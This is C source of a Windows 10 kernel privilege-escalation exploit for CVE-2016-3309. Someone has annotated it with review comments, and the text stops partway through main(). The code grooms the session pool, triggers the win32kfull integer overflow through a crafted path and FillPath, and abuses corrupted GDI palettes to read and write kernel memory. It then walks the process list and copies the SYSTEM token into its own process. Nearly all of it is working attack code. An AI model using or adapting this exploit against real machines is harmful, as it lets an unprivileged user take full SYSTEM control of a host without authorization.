#include <Windows.h>
#include <stdio.h>

/*
0: kd> dt ntdll!_EPROCESS uniqueprocessid token activeprocesslinks.
dtx is unsupported for this scenario.  It only recognizes dtx [<type>] [<address>] with -a, -h, and -r.  Reverting to dt.
+0x2e0 UniqueProcessId     : Ptr64 Void
+0x2e8 ActiveProcessLinks  :
+0x000 Flink               : Ptr64 _LIST_ENTRY
+0x008 Blink               : Ptr64 _LIST_ENTRY
+0x358 Token               : _EX_FAST_REF
*/
/*
Build-specific offsets used by the rest of this file.
The three EPROCESS offsets correspond to the `dt ntdll!_EPROCESS` output quoted
in the comment above; the last member is an offset relative to the nt image base.
All values have to be re-derived for any other build.
*/
typedef struct
{
	DWORD UniqueProcessIdOffset;     // _EPROCESS.UniqueProcessId
	DWORD ActiveProcessLinksOffset;  // _EPROCESS.ActiveProcessLinks
	DWORD TokenOffset;               // _EPROCESS.Token

	/* 
	unfortunately, the nt!EmpCheckErrataList is not exported.
	but you can get the offset like this:
	0: kd> ? nt!EmpCheckErrataList - nt
	Evaluate expression: 1284192 = 00000000`00139860
	*/
	DWORD nt_EmpCheckErrataList_offset; // nt!EmpCheckErrataList - nt (image base)
} VersionSpecificConfig;

// Offsets in member order: UniqueProcessId, ActiveProcessLinks, Token, nt_EmpCheckErrataList_offset.
VersionSpecificConfig gConfig = { 0x2e0, 0x2e8, 0x358, 0x139860, }; // win10 x64, build 15063.540

// Set to true by main() right before its SetPaletteEntries loop; polled by continuation_thread().
// NOTE(review): plain bool shared between two threads with no volatile/atomic/synchronization.
bool go = false;
// Handles of the palette triple currently being tried; main() assigns them on every loop iteration.
HPALETTE pwnd_palette = 0;
HPALETTE manager_palette = 0;
HPALETTE worker_palette = 0;
// Scratch buffer allocated in continuation_thread(); readOOB()/writeOOB() refuse to run while it is 0.
BYTE* manager_bits = 0;

// palette_overflow_count is specific to the scenario that the palettes are located at 
// the beginning of a separate pool page (i.e. with a distance of 0x1000)
// Both values are byte counts; callers divide by 4 to get a PALETTEENTRY count.
int palette_overflow_count_until_cEntries = 0xf98;
// NOTE(review): non-constant initializer of a global - valid C++, not valid C.
int palette_overflow_count_until_pFirstColor = palette_overflow_count_until_cEntries + 0x60;

// One group of palettes created together in main(): a dummy palette of
// palette_size plus three palettes created with size 0xfe0.
typedef struct target_objs_ {
	HPALETTE dummy_palette;   // created with createPaletteofSize(palette_size)
	HPALETTE pwnd_palette;    // palette main() calls SetPaletteEntries on
	HPALETTE manager_palette; // palette whose handle main() writes into the overflow data
	HPALETTE worker_palette;  // palette used by readOOB()/writeOOB() for the final Get/Set call
}target_objs;

// Number of target_objs groups allocated in main() and released in continuation_thread().
int create_objs_count = 0x800;
// Array of create_objs_count groups; allocated with calloc() in main().
// NOTE(review): never passed to free() anywhere in this file.
target_objs* targets_objects;


// make these global as well for accessibility in cleanup
HDC hdc;          // GetDC(NULL) result; released in continuation_thread()
HDC hMemDC;       // CreateCompatibleDC(hdc) result; the path calls in main() operate on it
HGDIOBJ bitmap;   // CreateBitmap() result selected into hMemDC
HGDIOBJ bitobj;   // previous object returned by SelectObject(hMemDC, bitmap)

// Signature used for the NtUserConvertMemHandle export that is resolved at runtime below.
typedef HANDLE(WINAPI* ZwUserConvertMemHandle)(BYTE* buf, DWORD size);
// Cached export address; resolved lazily on the first AllocateOnSessionPool() call.
ZwUserConvertMemHandle pfnUserConvertMemHandle = 0;
/*
Calls NtUserConvertMemHandle with a (size - 0x14)-byte buffer filled with 0x41.

size:    requested size; 0x14 is subtracted before the call (see comment in the body).
returns: INVALID_HANDLE_VALUE if the export cannot be resolved from win32u.dll or
         user32.dll; otherwise the HGLOBAL obtained from GlobalAlloc (hMem). The handle
         returned by NtUserConvertMemHandle (hMem2) is stored but not used or returned.

NOTE(review): `buffer` is never passed to free() and hMem is never released here, so every
call leaks both; no caller in this file uses the return value.
NOTE(review): malloc/GlobalAlloc/GlobalLock results are not checked, and a size below 0x14
makes alloc_size negative.
*/
HANDLE AllocateOnSessionPool(unsigned int size) {
	if (!pfnUserConvertMemHandle) {
		pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("win32u.dll"), "NtUserConvertMemHandle");
		if (!pfnUserConvertMemHandle) {
			// on win8.1 this function is located in user32.dll
			pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("user32.dll"), "NtUserConvertMemHandle");
			if (!pfnUserConvertMemHandle) {
				printf("could not find win32u!NtUserConvertMemHandle. exiting.\n");
				return INVALID_HANDLE_VALUE;
			}
		}
		//printf("pfnUserConvertMemHandle @ 0x%llx\n", (UINT64)pfnUserConvertMemHandle);
	}
	/*
	alloc_size will be passed to HMAllocObject, i.e. pool buffer will be preceded by 0x10 bytes header - that's why we calc -0x10
	the -0x14 comes from win32kfull!ConvertMemHandle  (lea r9d, [rdi+14h])
	NOTE(review): only 0x14 is subtracted below; the -0x10 mentioned above is not applied in this function.
	*/
	int alloc_size = size - 0x14;
	// temporary fill pattern; copied into the GlobalAlloc'ed block below
	BYTE *buffer = (BYTE*)malloc(alloc_size);
	memset(buffer, 0x41, alloc_size);
	HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, size);
	BYTE* buf = (BYTE*)GlobalLock(hMem);
	memcpy(buf, buffer, alloc_size);
	HANDLE hMem2 = pfnUserConvertMemHandle(buf, alloc_size);
	GlobalUnlock(hMem);
	return hMem;
}

/*
Passes hMem to SetClipboardData(CF_TEXT, ...) and then calls EmptyClipboard().
Return values of both calls are ignored.
No call to this function is visible in this file.
*/
void FreeFromSessionPool(HANDLE hMem) {
	/*
	for some reason, this doesn't work. TODO!
	*/
	SetClipboardData(CF_TEXT, hMem);
	EmptyClipboard();
}

/*
Creates a logical palette with (size - 0x90) / 4 entries via CreatePalette().

size:    target size in bytes; values <= 0x90 are rejected.
returns: the CreatePalette() result, or 0 when size is rejected.

All bytes of the LOGPALETTE are first set to 0x04, then palNumEntries and palVersion
(0x300) are filled in.

NOTE(review): the guard rejects size == 0x90 although the message says "< 0x90".
NOTE(review): lPalette is never passed to free(), and the malloc() result is not checked.
*/
HPALETTE createPaletteofSize(int size) {
	// we alloc a palette which will have the specific size on the paged session pool. 
	if (size <= 0x90) {
		printf("bad size! can't allocate palette of size < 0x90!\n");
		return 0;
	}
	// 0x90 bytes are treated as fixed overhead; the remainder is split into 4-byte entries
	int pal_cnt = (size - 0x90) / 4;
	// LOGPALETTE already contains one PALETTEENTRY, hence pal_cnt - 1
	int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
	LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
	memset(lPalette, 0x4, palsize);
	lPalette->palNumEntries = pal_cnt;
	lPalette->palVersion = 0x300;
	return CreatePalette(lPalette);
}

/*
Writes `size` bytes from `data` through worker_palette after patching two fields in
manager_bits and pushing manager_bits through manager_palette.

target_address: value stored as the 8 bytes at manager_bits[pFirstColor_count - 8].
data:           source bytes; also copied to the start of manager_bits.
size:           byte count; the final call uses size / 4 entries.
returns:        4 * the entry count returned by SetPaletteEntries(worker_palette, ...),
                or 0 if the palettes or manager_bits are not set up yet.

NOTE(review): size / 4 truncates, so a size that is not a multiple of 4 transfers fewer bytes.
NOTE(review): the return value of the SetPaletteEntries call on manager_palette is not checked.
*/
int writeOOB(UINT64 target_address, BYTE* data, int size) {
	if (!manager_palette || !worker_palette) {
		printf("[-] palettes not initialized yet!\n");
		return 0;
	}

	if (!manager_bits) {
		// need to read with GetPaletteEntries at least once before we can start
		printf("[-] manager_bits not initialized yet!\n");
		return 0;
	}
		
	// set cEntries
	// (0x18*4 == 0x60, so this index equals palette_overflow_count_until_cEntries;
	//  the value stored is the byte count `size`, not size / 4)
	memcpy(&manager_bits[palette_overflow_count_until_pFirstColor - (0x18*4)], &size, sizeof(DWORD));

	// set pFirstColor to target_address
	memcpy(&manager_bits[palette_overflow_count_until_pFirstColor - 0x8], &target_address, sizeof(UINT64));

	// set data to copy
	// (this overwrites the first `size` bytes of manager_bits; the final call below passes `data` directly)
	memcpy(manager_bits, data, size);

	// overflow into worker_palette to set values
	SetPaletteEntries(manager_palette, 0, palette_overflow_count_until_pFirstColor / 4, (PALETTEENTRY*)manager_bits);
	
	// trigger SetPaletteEntries on worker_palette to write the actual data
	// return actual amount of bytes written (*4), not amount of palette entries written
	return SetPaletteEntries(worker_palette, 0, size / 4, (PALETTEENTRY*)data) * 4;
}

/*
Reads `size` bytes into `data` through worker_palette after patching two fields in
manager_bits and pushing manager_bits through manager_palette.

target_address: value stored as the 8 bytes at manager_bits[pFirstColor_count - 8].
data:           destination buffer; must hold at least `size` bytes.
size:           byte count; the final call uses size / 4 entries.
returns:        4 * the entry count returned by GetPaletteEntries(worker_palette, ...),
                or 0 if the palettes or manager_bits are not set up yet.

NOTE(review): size / 4 truncates, so a size that is not a multiple of 4 transfers fewer bytes.
NOTE(review): the return value of the SetPaletteEntries call on manager_palette is not checked.
*/
int readOOB(UINT64 target_address, BYTE* data, int size) {
	if (!manager_palette || !worker_palette) {
		printf("[-] palettes not initialized yet!\n");
		return 0;
	}

	if (!manager_bits) {
		// need to read with GetPaletteEntries at least once before we can start
		printf("[-] manager_bits not initialized yet!\n");
		return 0;
	}
	
	// set cEntries
	// (0x18 * 4 == 0x60, so this index equals palette_overflow_count_until_cEntries;
	//  the value stored is the byte count `size`, not size / 4)
	memcpy(&manager_bits[palette_overflow_count_until_pFirstColor - (0x18 * 4)], &size, sizeof(DWORD));

	// set pFirstColor to target_address
	memcpy(&manager_bits[palette_overflow_count_until_pFirstColor - 0x8], &target_address, sizeof(UINT64));

	// overflow into worker_palette to set values
	SetPaletteEntries(manager_palette, 0, palette_overflow_count_until_pFirstColor / 4, (PALETTEENTRY*)manager_bits);
	
	// trigger GetPaletteEntries on worker_palette to read the actual data
	// return actual amount of bytes read (*4), not amount of palette entries read
	return GetPaletteEntries(worker_palette, 0, size / 4, (PALETTEENTRY*)data) * 4;
}

/*
Second-thread body started from main() via CreateThread.

Sequence, as written below:
  1. poll the global `go` flag, then sleep one more second;
  2. read 0x1000 bytes through manager_palette into manager_bits and bail out if
     fewer entries come back;
  3. derive the three palette addresses from the data just read and write back a
     handle value, two 16-byte headers and two 8-byte zero values via writeOOB();
  4. read a pointer, subtract gConfig.nt_EmpCheckErrataList_offset to get an image
     base, and read PsInitialSystemProcess relative to that base;
  5. walk ActiveProcessLinks until an entry's UniqueProcessId equals GetCurrentProcessId();
  6. copy the Token field from the system EPROCESS to the current one;
  7. delete the GDI objects created in main().

NOTE(review): the signature is `void (void)` but main() casts it to LPTHREAD_START_ROUTINE.
NOTE(review): every early `return` skips the cleanup at the end; manager_bits is never freed.
*/
void continuation_thread() {

	printf("[+] continuation thread waiting for signal...\n");
	// busy-wait (100 ms granularity) on the flag main() sets
	while (!go)
		Sleep(100);

	// now we're in the overflow loop in the main thread. wait a bit to make sure we've hit the overflow
	Sleep(1000);

	printf("[+] now check overflow success in continuation thread\n");

	// stay in loop of GetPaletteEntries read attempts until we detect that we have OOB RW capabilities
	// NOTE(review): as written the body runs at most once - any count other than
	// oob_read_count / 4 (including 0) returns, and a full count ends the loop after the Sleep.
	int oob_read_count = 0x1000;
	manager_bits = (BYTE*)malloc(oob_read_count);
	int cRead = 0;
	while (!cRead) {
		cRead = GetPaletteEntries(manager_palette, 0, oob_read_count / 4, (PALETTEENTRY*)manager_bits);
		if (cRead != oob_read_count / 4) {
			printf("[-] could not detect arbitrary RW. expected to read 0x%x but only got 0x%x\n", oob_read_count, cRead * 4);
			return;
		}
		Sleep(1000);
	}

	printf("[+] successfully detected OOB RW capability in continuation thread!\n");

	/////// as soon as we have arbitrary RW we repair several structure members 
	// worker_palette_obj is an address inside the local manager_bits copy (not a remote address):
	// the position 0x20 bytes before the cEntries offset.
	UINT64 worker_palette_obj = (UINT64)manager_bits + palette_overflow_count_until_cEntries - 0x20;
	//printf("[+] worker palette object is @ 0x%llx\n", worker_palette_obj);

	/////// then we repair the overwritten handle of the pwnd_palette!

	// original_pFirstColor points to manager_palette + 0x78 (or pool page + 0x88)
	DWORD offset_start_PaletteObject_to_pFirstColor = 0x78;
	UINT64 worker_palette_pFirstColor = *(UINT64*)(worker_palette_obj + offset_start_PaletteObject_to_pFirstColor);
	//printf("[+] worker_palette_pFirstColor: 0x%llx\n", worker_palette_pFirstColor);
	// the three objects are assumed to be 0x1000 bytes apart (see the comment on the
	// palette_overflow_count globals); 0x78 + 0x10 is subtracted from the pointer first
	UINT64 pwnd_palette_address = worker_palette_pFirstColor - (offset_start_PaletteObject_to_pFirstColor + 0x10) - 0x2000;
	UINT64 manager_palette_address = worker_palette_pFirstColor - (offset_start_PaletteObject_to_pFirstColor + 0x10) - 0x1000;
	UINT64 worker_palette_address = worker_palette_pFirstColor - (offset_start_PaletteObject_to_pFirstColor + 0x10);
	printf("[+] pwnd palette located @ 0x%llx\n", pwnd_palette_address);
	printf("[+] manager palette located @ 0x%llx\n", manager_palette_address);
	printf("[+] worker palette located @ 0x%llx\n", worker_palette_address);

	printf("[+] repairing BASEOBJ64.hHmgr value of pwnd_palette (0x%llx) at address 0x%llx\n", (UINT64)pwnd_palette, pwnd_palette_address);
	// writes the 8-byte handle value of the global pwnd_palette
	int cWritten = writeOOB(pwnd_palette_address, (BYTE*)&pwnd_palette, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of pwnd_palette handle failed!\n");
		return;
	}

	/*
	fix pool header, this is static for a given size. errm. lol. kernel hacking is so 1999 >_<
	0: kd> db ffffe428`9c5f8000+2000
	ffffe428`9c5fa000  00 00 ff 23 47 68 30 35-00 00 00 00 00 00 00 00  ...#Gh05........
	ffffe428`9c5fa010  50 08 05 0c 00 00 00 00-00 00 00 00 00 00 00 00  P...............
	ffffe428`9c5fa020  80 c0 3b d7 81 a9 ff ff-00 00 00 00 00 00 00 00  ..;.............
	NOTE(review): the dump above shows bytes 47 68 30 35, while the array below contains 47 68 30 38.
	*/
	// sizeof(...) - 1 drops the string literal's terminating NUL, leaving 16 bytes
	BYTE pool_header_palette[] = "\x00\x00\xff\x23\x47\x68\x30\x38\x00\x00\x00\x00\x00\x00\x00\x00";
	printf("[+] repairing pool header of pwnd_palette\n");
	cWritten = writeOOB(pwnd_palette_address - 0x10, (BYTE*)&pool_header_palette, sizeof(pool_header_palette) - 1);
	if (cWritten != sizeof(pool_header_palette) - 1) {
		printf("[-] repair of pool_header_palette failed!\n");
		return;
	}

	printf("[+] repairing ref counts of palettes\n");
	// zero the 8 bytes at offset +0x8 of the pwnd and manager objects
	UINT64 null_ptr = 0;
	cWritten = writeOOB(pwnd_palette_address + 0x8, (BYTE*)&null_ptr, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of ref count for pwnd_palette failed!\n");
		return;
	}
	cWritten = writeOOB(manager_palette_address + 0x8, (BYTE*)&null_ptr, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of ref count for manager_palette failed!\n");
		return;
	}

	printf("[+] repairing pool header after pwnd_palette buffer\n");
	// 16 bytes written 0x20 below the manager object address
	BYTE next_pool_header[] = "\xff\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
	cWritten = writeOOB(manager_palette_address - 0x20, (BYTE*)&next_pool_header, sizeof(next_pool_header) - 1);
	if (cWritten != sizeof(next_pool_header) - 1) {
		printf("[-] repair of next_pool_header failed!\n");
		return;
	}

	printf("[+] now getting ntoskrnl base\n");

	UINT64 nt_EmpCheckErrataList = 0;
	// value taken from the local manager_bits copy, 0x10 bytes into the worker object image
	UINT64 tid_ptr = *(UINT64*)(worker_palette_obj + 0x10); // the BASEOBJECT64 structure seems to have changed. obviously, this is not a tid ;)
	printf("[+] reading nt!EmpCheckErrataList from @ 0x%llx\n", tid_ptr + 0x2a8);
	cRead = readOOB(tid_ptr + 0x2a8, (BYTE*)&nt_EmpCheckErrataList, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !nt_EmpCheckErrataList) {
		printf("[-] couldn't read nt!EmpCheckErrataList pointer!\n");
		return;
	}

	printf("[+] nt!EmpCheckErrataList @ 0x%llx\n", nt_EmpCheckErrataList);

	// base = leaked pointer - build-specific offset from gConfig
	UINT64 ntoskrnl_base_address = nt_EmpCheckErrataList - gConfig.nt_EmpCheckErrataList_offset;
	printf("[+] ntoskrnl base address: 0x%llx\n", ntoskrnl_base_address);

	// load the image into this process only to compute the export's offset from its base
	// NOTE(review): the LoadLibrary/GetProcAddress results are not checked before use.
	UINT64 ntoskrnl = (UINT64)LoadLibrary("ntoskrnl.exe");
	// get address of exported PsInitialSystemProcess variable
	UINT64 pPsInitialSystemProcess = (UINT64)GetProcAddress((HMODULE)ntoskrnl, "PsInitialSystemProcess");
	UINT64 delta_PsInitialSystemProcess = pPsInitialSystemProcess - ntoskrnl;
	FreeLibrary((HMODULE)ntoskrnl);

	printf("[+] reading system EPROCESS from 0x%llx\n", ntoskrnl_base_address + delta_PsInitialSystemProcess);
	UINT64 system_eprocess = 0;
	// subtract addr from ntos to get PsInitialSystemProcess offset from base
	cRead = readOOB(ntoskrnl_base_address + delta_PsInitialSystemProcess, (BYTE *)&system_eprocess, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !system_eprocess) {
		printf("[-] couldn't read SYSTEM eprocess!\n");
		return;
	}
	printf("[+] system eprocess @ 0x%llx\n", system_eprocess);

	// walk ActiveProcessLinks until we find our Pid
	LIST_ENTRY ActiveProcessLinks;
	cRead = readOOB(system_eprocess + gConfig.ActiveProcessLinksOffset, (BYTE*)&ActiveProcessLinks, sizeof(LIST_ENTRY));
	if (cRead != sizeof(LIST_ENTRY) || !ActiveProcessLinks.Flink) {
		printf("[-] couldn't read ActiveProcessLinks!\n");
		return;
	}

	printf("[+] now walking ActiveProcessLinks to find EPROCESS of current process...\n");
	UINT64 pEPROCESS = 0;
	UINT64 current_proc_eprocess = 0;
	UINT64 UniqueProcessId = 0;
	while (1) {
		// Flink points at the next entry's ActiveProcessLinks member; step back to the structure start
		pEPROCESS = (UINT64)ActiveProcessLinks.Flink - gConfig.ActiveProcessLinksOffset;

		// get pid of current EPROCESS
		cRead = readOOB(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE*)&UniqueProcessId, sizeof(UINT64));
		if (cRead != sizeof(UINT64) || !UniqueProcessId) {
			printf("[-] could not read ActiveProcessLinks!\n");
			break;
		}
		//printf("[+] pEPROCESS 0x%llx, PID 0x%llx (0x%x)\n", pEPROCESS, UniqueProcessId, GetCurrentProcessId());

		// is this our pid? break loop if this is the case
		// (DWORD compared against a UINT64)
		if (GetCurrentProcessId() == UniqueProcessId) {
			current_proc_eprocess = pEPROCESS;
			break;
		}

		// get next entry
		cRead = readOOB(pEPROCESS + gConfig.ActiveProcessLinksOffset, (BYTE*)&ActiveProcessLinks, sizeof(LIST_ENTRY));
		if (cRead != sizeof(LIST_ENTRY) || !ActiveProcessLinks.Flink) {
			printf("[-] could not read ActiveProcessLinks!\n");
			break;
		}

		// if next same as last, we reached the end
		if (pEPROCESS == (UINT64)ActiveProcessLinks.Flink - gConfig.ActiveProcessLinksOffset)
			break;
	}

	// every `break` above other than the pid match leaves this at 0
	if (!current_proc_eprocess) {
		printf("[-] walking EPROCESS structures failed: could not spot current process EPROCESS!\n");
		return;
	}

	printf("[+] found EPROCESS of current process @ 0x%llx\n", current_proc_eprocess);
	printf("[+] getting SYSTEM token\n");
	UINT64 SystemToken = 0;
	cRead = readOOB(system_eprocess + gConfig.TokenOffset, (BYTE*)&SystemToken, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !SystemToken) {
		printf("[-] could not read SYSTEM token\n");
		return;
	}

	printf("[+] writing SYSTEM token address 0x%llx to current EPROCESS at 0x%llx\n", SystemToken, current_proc_eprocess + gConfig.TokenOffset);
	cWritten = writeOOB(current_proc_eprocess + gConfig.TokenOffset, (BYTE*)&SystemToken, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] writing SYSTEM token failed!\n");
		return;
	}

	printf("[+] cleanup...\n");
	for (int i = 0; i < create_objs_count; i++) {
		DeleteObject(targets_objects[i].dummy_palette);
		// we only skip the pwnd palette since it is locked by the SetPalEntries syscall in main thread :)
		// (the group in use is identified by comparing its manager_palette with the global one;
		//  its manager and worker palettes are still deleted below)
		if (targets_objects[i].manager_palette != manager_palette)
			DeleteObject(targets_objects[i].pwnd_palette);
		DeleteObject(targets_objects[i].manager_palette);
		DeleteObject(targets_objects[i].worker_palette);
	}
	DeleteObject(bitobj);
	DeleteObject(bitmap);
	DeleteDC(hMemDC);
	ReleaseDC(NULL, hdc);

	printf("[+] done.\n");
	return;
}

/*
Program entry point.

Sequence, as written below:
  1. create a memory DC with a 0x666 x 0x1338, 32-bit bitmap selected into it;
  2. prepare rPalette, the entry buffer later passed to SetPaletteEntries;
  3. start continuation_thread();
  4. build a path on hMemDC from sizeA PolylineTo calls of sizeB points each;
  5. perform the allocation sequence (AllocateOnSessionPool / createPaletteofSize);
  6. call FillPath(), set `go`, then call SetPaletteEntries on each pwnd_palette in
     reverse creation order;
  7. block forever in Sleep(-1).

argc/argv are unused.

NOTE(review): `void main` is non-standard; `success` is declared but never used.
NOTE(review): rPalette, points and the thread handle returned by CreateThread are never released,
and none of the GDI/CreateThread/malloc/calloc results are checked.
NOTE(review): the early `return` statements exit main() after continuation_thread has been started.
*/
void main(int argc, char* argv[]) {
	printf("[+] win32kfull!bFill (aka. CVE-2016-3309) reloaded, @bitshifter123, siberas, 10/2017\n");
	printf("[+] target: Windows 10 x64 RS2 (build 15063.540)\n");
	printf("[+] exploitation primitive: PALETTES\n");

	hdc = GetDC(NULL);
	hMemDC = CreateCompatibleDC(hdc);
	bitmap = CreateBitmap(0x666, 0x1338, 1, 32, NULL);
	bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);

	int read_palettes_count = 0x1000;
	bool success = false;
	// calloc zero-fills, then every byte is immediately overwritten with 0x04
	PALETTEENTRY *rPalette = (PALETTEENTRY*)calloc(read_palettes_count, sizeof(PALETTEENTRY));
	memset(rPalette, 0x04, read_palettes_count * sizeof(PALETTEENTRY));

	// marker value stored in the last entry that the SetPaletteEntries loop below sends
	DWORD deadc0de = 0xdeadc0de;
	memcpy(&rPalette[(palette_overflow_count_until_cEntries / 4) -1], &deadc0de, sizeof(DWORD));
	/*
	fix pool header, this is static for a given size
	0: kd> db ffffe428`9c6c8000+2000
	ffffe428`9c6ca000  00 00 ff 23 47 68 30 35-00 00 00 00 00 00 00 00  ...#Gh08........
	ffffe428`9c6ca010  50 57 05 0c 00 00 00 00-00 00 00 00 00 00 00 00  P...............
	ffffe428`9c6ca020  80 c0 3b d7 81 a9 ff ff-00 00 00 00 00 00 00 00  ..;.............
	NOTE(review): the hex column above shows 30 35 while its ASCII column and the array below use "08" (30 38).
	*/
	// sizeof(...) - 1 drops the string literal's terminating NUL, leaving 16 bytes;
	// they are placed 12 entries (0x30 bytes) before the cEntries offset
	BYTE pool_header_palette[] = "\x00\x00\xff\x23\x47\x68\x30\x38\x00\x00\x00\x00\x00\x00\x00\x00";
	memcpy(&rPalette[(palette_overflow_count_until_cEntries / 4) - 12], &pool_header_palette, sizeof(pool_header_palette) - 1);


	// kick off second thread which will keep us alive when we hit the SetPaletteEntries syscall on the overwritten object
	DWORD tid;
	CreateThread(0, 0, (LPTHREAD_START_ROUTINE)continuation_thread, 0, 0, &tid);

	/*
	// offset +0
	0x30: 0x10000 * 0x10000 = 0x10000000 => 0x10000001 * 0x30 = (int32)0x30
	0x60: 0x11 * 0xf0f0f1 = 0x10000001 => 0x10000002 * 0x30 = (int32)0x60
	0x90: 0xc06*0x154ab = 0x10000002 => 0x10000003 * 0x30 = (int32)0x90

	// offset +10
	0x10: 0xccd*0xd552	= 0xaaaaaaa => 0xaaaaaab *0x30 = 0x200000010 = (int32)0x10 => alloc of 0x20
	0x40: 0x3b*0x2e4851	= 0xaaaaaab => 0xaaaaaac *0x30 = 0x200000040 = (int32)0x40 => alloc of 0x50
	0x70: 0x804*0x154ab	= 0xaaaaaac => 0xaaaaaad *0x30 = 0x200000070 = (int32)0x70 => alloc of 0x80
	0xa0: 0x1769*0x74a5	= 0xaaaaaad => 0xaaaaaae *0x30 = 0x2000000a0 = (int32)0xa0 => alloc of 0xb0

	// offset +20
	0x20: 0x27b*0x2266f = 0x5555555 => 0x5555556 * 0x30 = (int32)0x20 => alloc of 0x30 bytes
	0x50: 0x156*0x3FE01 = 0x5555556 => 0x5555557 * 0x30 = (int32)0x50 => alloc of 0x60 bytes
	0x80: 0xa1*0x87af7	= 0x5555557 => 0x5555558 * 0x30 = (int32)0x80 => alloc of 0x90 bytes
	0xb0: 0xfd3*0x5648	= 0x5555558 => 0x5555559 * 0x30 = (int32)0xb0 => alloc of 0xc0 bytes
	0xe0: 0x13369*0x471	= 0x5555559 => 0x555555a * 0x30 = (int32)0xe0 => alloc of 0xf0 bytes
	*/
	// the pair in use is the "0xa0" row of the table above
	int sizeA = 0x1769;
	int sizeB = 0x74a5;
	// both sizes are WITHOUT header, i.e. if they should add up to 0x1000
	// we need for example chunksize 0xf40 and palette_size 0xa0. 0xf40 + 0x10 + 0xa0 + 0x10 == 0x1000
	// NOTE(review): chunksize is computed in `int` and relies on 32-bit wraparound of the
	// multiplication by 0x30 (signed overflow); real_size is the same expression in 64 bits.
	DWORD chunksize = (DWORD)(((sizeA * sizeB) + 1) * 0x30);
	UINT64 real_size = (((UINT64)sizeA * (UINT64)sizeB) + 1) * 0x30;
	int palette_size = 0x1000 - 0x10 - chunksize - 0x10;
	//printf("[+] sizeA 0x%x\n", sizeA);
	//printf("[+] sizeB 0x%x\n", sizeB);
	printf("[+] prepare int overflow: ((0x%x * 0x%x) + 1) * 0x30 == 0x%llx == (int32) 0x%x\n", sizeA, sizeB, real_size, chunksize);
	//printf("[+] chunksize == 0x%x => palette_size == 0x%x\n", chunksize, palette_size);
	printf("[+] header + chunksize + header + palette_size = 0x%x + 0x10 + 0x%x + 0x10 = 0x%x\n", chunksize, palette_size, chunksize + 0x10 + palette_size + 0x10);

	// sanity check: both pieces plus two 0x10 headers must add up to exactly 0x1000
	if (chunksize > 0x1000 ||
		palette_size > 0x1000 ||
		palette_size + chunksize + 0x20 != 0x1000) {
		printf("[-] bad sizes!? exiting!\n");
		return;
	}

	// sizeB points, all initialised to the same coordinate value
	POINT* points = (POINT*)malloc(sizeB * sizeof(POINT));
	DWORD point_value = 0x66000000;
	for (int x = 0; x < sizeB; x++) {
		points[x].x = point_value;
		points[x].y = point_value;
	}

	printf("[BUG 1/4] BeginPath\n");	
	if (!BeginPath(hMemDC)) {
		printf("[-] BeginPath() Failed: %x\n", GetLastError());
		return;
	}

	printf("[BUG 2/4] PolylineTo\n");
	// sizeA calls of sizeB points each; only the first call uses different values for points[1] and points[2]
	for (int j = 0; j < sizeA; j++) {
		if (j == 0)
		{
			points[1].x = 0x11223344;
			points[1].y = 0x360;
			points[2].x = 1;
			points[2].y = 0x400;
		}
		else
		{
			points[1].x = point_value;
			points[1].y = point_value;
			points[2].x = point_value;
			points[2].y = point_value;
		}

		if (!PolylineTo(hMemDC, points, sizeB)) {
			printf("[-] PolylineTo() Failed: %x\n", GetLastError());
			return;
		}
	}

	printf("[BUG 3/4] EndPath\n");
	EndPath(hMemDC);

	printf("[+] now perform pool feng shui...\n");

	// raise priority for the allocation sequence; restored after FillPath below
	SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);


	// defragment on page level  we will cause 0xfe0 + 0x10 = 0xff0-sized buffers, filling one pool page each
	for (int i = 0; i < 0x400; i++) {
		AllocateOnSessionPool(0xfe0);
	}

	// defragment with chunksize - we will create buffer on pool of size chunksize + 0x10
	for (int i = 0; i < 0x5000; i++) {
		AllocateOnSessionPool(chunksize);
	}

	targets_objects = (target_objs*)calloc(create_objs_count, sizeof(target_objs));

	// one dummy palette of palette_size followed by three 0xfe0 palettes per group
	for (int i = 0; i < create_objs_count; i++) {
		targets_objects[i].dummy_palette = createPaletteofSize(palette_size);
		targets_objects[i].pwnd_palette = createPaletteofSize(0xfe0);   // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].manager_palette = createPaletteofSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].worker_palette = createPaletteofSize(0xfe0);  // -> pool will be 0xff0 alloc'ed / 0x10 free
	}

	// now trigger some more chunksize allocations to fill the holes
	for (int i = 0; i < create_objs_count / 2; i++) {
		AllocateOnSessionPool(chunksize);
	}

	// finally, trigger bug in FillPath!
	FillPath(hMemDC);

	SetPriorityClass(GetCurrentProcess(), NORMAL_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);

	printf("[BUG 4/4] hit trigger in FillPath!\n");
	printf("[+] trigger 2nd overflow via SetPaletteEntries - main thread will deadlock now\n");
	Sleep(100);

	// set flag for continuation thread and hit SetPaletteEntries right afterwards
	go = true;

	// trigger overflow into manager palette to set EPALOBJ.cEntries
	// be careful to overwrite with correct BaseObject.hHmgr!
	// groups are tried in reverse creation order
	for (int i = create_objs_count - 1; i >= 0; i--) {

		// set global palette vars
		pwnd_palette = targets_objects[i].pwnd_palette;
		manager_palette = targets_objects[i].manager_palette;
		worker_palette = targets_objects[i].worker_palette;

		// make sure we overwrite BASEOBJECT64.hHmgr with the correct manager_palette handle
		// (stored 8 entries, i.e. 0x20 bytes, before the cEntries offset)
